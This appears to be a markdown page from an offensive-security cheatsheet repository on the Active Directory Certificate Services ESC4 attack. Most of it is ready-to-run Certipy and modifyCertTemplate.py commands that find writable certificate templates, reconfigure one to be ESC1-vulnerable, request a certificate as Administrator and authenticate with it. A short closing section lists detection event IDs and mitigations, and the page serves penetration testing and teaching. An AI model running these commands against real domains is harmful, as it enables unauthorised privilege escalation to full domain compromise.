daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-30-esc4-template-write-permissions.md (4890B)


      1 ---
      2 title: "Attack #30 โ€” ESC4 Template Write Permissions"
      3 description: "ESC4 exploits overly permissive ACLs on certificate templates. If a low-privileged user has WriteProperty, WriteDACL, WriteOwner, or FullControl on aโ€ฆ"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/๐ŸŸข Attack #30 โ€” ESC4 Template Write Permissions.md"
     11 ---
     12 # ๐ŸŸข Attack #30 โ€” ESC4: Template Write Permissions
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 ESC4 exploits **overly permissive ACLs on certificate templates**. If a low-privileged user has **WriteProperty, WriteDACL, WriteOwner, or FullControl** on a template object, they can modify that template's configuration to make it vulnerable to ESC1 โ€” enabling the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag, adding Client Authentication EKU, and removing approval requirements. Once modified, the attacker enrolls using the now-vulnerable template to get a certificate for any user.
     19 
     20 ### The Attack Flow
     21 
     22 ```
     23 1. Find a template where you have write permissions
     24 2. Modify the template:
     25    - Enable ENROLLEE_SUPPLIES_SUBJECT (allows SAN specification)
     26    - Set EKU to Client Authentication
     27    - Disable Manager Approval
     28    - Disable Authorized Signatures
     29 3. Request certificate with SAN = Administrator
     30 4. Authenticate as Administrator
     31 5. Revert template changes (cleanup)
     32 ```
     33 
     34 ***
     35 
     36 ## โš™๏ธ Prerequisites
     37 
     38 | Requirement | Detail |
     39 |---|---|
     40 | **Write permissions on template** | WriteProperty, WriteDACL, WriteOwner, or FullControl |
     41 | **Enrollment rights** | Must also be able to enroll for the template |
     42 
     43 ***
     44 
     45 ## ๐Ÿ’ป Full Commands
     46 
     47 ### ๐Ÿ”ต Enumerate Writable Templates
     48 
     49 ```bash
     50 # โ”€โ”€ Certipy โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     51 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout
     52 # Look for: ESC4 โ€” template ACL allows modification
     53 
     54 # โ”€โ”€ modifyCertTemplate.py โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     55 python3 modifyCertTemplate.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
     56   -template VulnTemplate -get-acl
     57 ```
     58 
     59 ### ๐Ÿ”ด Modify Template โ†’ Convert to ESC1
     60 
     61 ```bash
     62 # โ”€โ”€ Certipy โ€” modify template to be ESC1-vulnerable โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     63 # Save current config first:
     64 certipy template -u low_user@corp.local -p 'Password1' \
     65   -template VulnTemplate -save-old -dc-ip 10.10.10.10
     66 
     67 # Modify to ESC1:
     68 certipy template -u low_user@corp.local -p 'Password1' \
     69   -template VulnTemplate -dc-ip 10.10.10.10 \
     70   -configuration ESC1
     71 
     72 # โ”€โ”€ Alternative: modifyCertTemplate.py โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     73 python3 modifyCertTemplate.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \
     74   -template VulnTemplate \
     75   -add enrollee_supplies_subject \
     76   -add client_authentication
     77 ```
     78 
     79 ### ๐Ÿ”ด Exploit as ESC1
     80 
     81 ```bash
     82 # โ”€โ”€ Request certificate with SAN = Administrator โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     83 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     84   -template VulnTemplate -upn Administrator@corp.local -dc-ip 10.10.10.10
     85 
     86 # โ”€โ”€ Authenticate โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     87 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     88 ```
     89 
     90 ### ๐Ÿ”ด Cleanup โ€” Revert Template
     91 
     92 ```bash
     93 # โ”€โ”€ Restore original template configuration โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     94 certipy template -u low_user@corp.local -p 'Password1' \
     95   -template VulnTemplate -dc-ip 10.10.10.10 -configuration VulnTemplate.json
     96 ```
     97 
     98 ***
     99 
    100 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    101 
    102 | Event ID | Source | What to Look For |
    103 |---|---|---|
    104 | **4899** | Security Log (CA) | Certificate template modification |
    105 | **5136** | Security Log (DC) | AD object modification (template object in CN=Certificate Templates) |
    106 
    107 ***
    108 
    109 ## ๐Ÿ”— Attack Chain Context
    110 
    111 ```
    112 [ESC4] โ”€โ”€โ†’ Write access on template โ†’ convert to ESC1 โ†’ domain compromise
    113          โ”‚
    114          โ”œโ”€โ”€โ†’ ๐Ÿ”— Converts any writable template into ESC1
    115          โ”œโ”€โ”€โ†’ ๐Ÿ“‹ Always revert changes after exploitation
    116          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: restrict template ACLs, monitor 4899/5136
    117 ```
    118 
    119 ***
    120 
    121 > โœ… **Attack #30 โ€” ESC4 complete.**